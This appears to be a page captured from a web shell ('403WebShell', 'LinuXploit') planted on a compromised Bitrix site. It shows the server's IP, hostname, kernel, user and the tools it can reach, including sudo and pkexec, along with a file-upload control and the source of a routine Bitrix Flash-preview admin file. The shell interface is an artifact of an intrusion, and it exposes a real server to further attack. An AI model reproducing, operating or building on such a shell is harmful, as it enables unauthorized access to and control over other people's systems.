403WebShell

403Webshell

Server IP : 80.87.202.40 / Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON
Directory : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/fileman/admin/

Upload File :

[ Back ]

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/fileman/admin/fileman_flash_preview.php

<?
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_admin_before.php");
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/prolog.php");

if (!$USER->CanDoOperation('fileman_view_file_structure'))
	$APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));

require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/include.php");

if (isset($_GET['path']))
{
	$flashExtensions = array("swf", "spl");
	$extension = GetFileExtension(mb_strtolower($path));

	if(!in_array($extension, $flashExtensions))
		return false;

	$site = CFileMan::__CheckSite($site);
	if(!$site)
		$site = CSite::GetSiteByFullPath($_SERVER["DOCUMENT_ROOT"].$path);

	$io = CBXVirtualIo::GetInstance();

	$documentRoot = CSite::GetSiteDocRoot($site);
	$path = $io->CombinePath("/", $path);
	$abs_path = $documentRoot.$path;
	$arPath = Array($site, $path);

	if ($io->FileExists($abs_path) && $USER->CanDoFileOperation('fm_view_file', $arPath))
	{
		$width = isset($width) ? 'width="'.htmlspecialcharsex($width).'"' : '';
		$height = isset($height) ? 'height="'.htmlspecialcharsex($height).'"' : '';
		?>
<HTML><HEAD></HEAD><BODY>
<embed id="flash_preview" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="preview_flash"
quality="high" <?=$width?> <?=$height?> src="<?=htmlspecialcharsex($path)?>" />
</BODY></HTML>
		<?
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit